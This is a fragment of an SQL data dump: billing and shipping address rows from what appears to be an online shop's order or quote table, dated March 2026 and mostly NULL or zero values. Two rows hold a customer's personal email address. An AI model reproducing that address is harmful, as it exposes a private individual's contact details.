(930, 648, '2026-03-27 11:14:38', '2026-03-27 11:14:38', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(931, 648, '2026-03-27 11:14:38', '2026-03-27 11:14:38', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(932, 649, '2026-03-27 15:03:03', '2026-03-27 15:03:03', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(933, 649, '2026-03-27 15:03:03', '2026-03-27 15:03:03', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(934, 650, '2026-03-27 17:04:00', '2026-03-27 17:04:00', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(935, 650, '2026-03-27 17:04:00', '2026-03-27 17:04:00', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(936, 651, '2026-03-27 17:53:07', '2026-03-27 17:53:07', 130, 0, NULL, 'billing', 'o.seme.j.u.z.i.0.8@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(937, 651, '2026-03-27 17:53:07', '2026-03-27 17:53:07', 130, 0, NULL, 'shipping', 'o.seme.j.u.z.i.0.8@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(938, 652, '2026-03-27 17:53:10', '2026-03-27 17:53:10', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(939, 653, '2026-03-27 18:09:48', '2026-03-27 18:09:48', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(940, 653, '2026-03-27 18:09:48', '2026-03-27 18:09:48', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(941, 654, '2026-03-27 18:20:36', '2026-03-27 18:20:36', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(942, 654, '2026-03-27 18:20:36', '2026-03-27 18:20:36', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(943, 655, '2026-03-27 18:20:38', '2026-03-27 18:20:38', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(944, 655, '2026-03-27 18:20:38', '2026-03-27 18:20:38', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(945, 656, '2026-03-27 18:20:39', '2026-03-27 18:20:39', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(946, 656, '2026-03-27 18:20:39', '2026-03-27 18:20:39', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(947, 657, '2026-03-27 18:20:40', '2026-03-27 18:20:40', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(948, 657, '2026-03-27 18:20:40', '2026-03-27 18:20:40', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(949, 658, '2026-03-27 18:20:41', '2026-03-27 18:20:41', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(950, 658, '2026-03-27 18:20:41', '2026-03-27 18:20:41', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(951, 659, '2026-03-27 18:20:43', '2026-03-27 18:20:43', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(952, 659, '2026-03-27 18:20:43', '2026-03-27 18:20:43', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(953, 660, '2026-03-27 18:20:44', '2026-03-27 18:20:44', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(954, 660, '2026-03-27 18:20:44', '2026-03-27 18:20:44', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(955, 661, '2026-03-27 18:20:45', '2026-03-27 18:20:45', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(956, 661, '2026-03-27 18:20:45', '2026-03-27 18:20:45', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(957, 662, '2026-03-27 18:20:47', '2026-03-27 18:20:47', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(958, 662, '2026-03-27 18:20:47', '2026-03-27 18:20:47', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(959, 663, '2026-03-27 18:20:48', '2026-03-27 18:20:48', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(960, 663, '2026-03-27 18:20:48', '2026-03-27 18:20:48', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(961, 664, '2026-03-27 18:20:49', '2026-03-27 18:20:49', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(962, 664, '2026-03-27 18:20:49', '2026-03-27 18:20:49', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(963, 665, '2026-03-27 18:20:50', '2026-03-27 18:20:50', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(964, 665, '2026-03-27 18:20:50', '2026-03-27 18:20:50', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(965, 666, '2026-03-27 18:20:52', '2026-03-27 18:20:52', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(966, 666, '2026-03-27 18:20:52', '2026-03-27 18:20:52', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(967, 667, '2026-03-27 18:20:58', '2026-03-27 18:20:58', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(968, 667, '2026-03-27 18:20:58', '2026-03-27 18:20:58', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(969, 668, '2026-03-27 18:21:00', '2026-03-27 18:21:00', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(970, 668, '2026-03-27 18:21:00', '2026-03-27 18:21:00', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(971, 669, '2026-03-27 18:21:06', '2026-03-27 18:21:06', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(972, 669, '2026-03-27 18:21:06', '2026-03-27 18:21:06', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(973, 670, '2026-03-27 18:21:14', '2026-03-27 18:21:14', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(974, 670, '2026-03-27 18:21:14', '2026-03-27 18:21:14', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(975, 671, '2026-03-27 18:21:17', '2026-03-27 18:21:17', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(976, 671, '2026-03-27 18:21:17', '2026-03-27 18:21:17', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
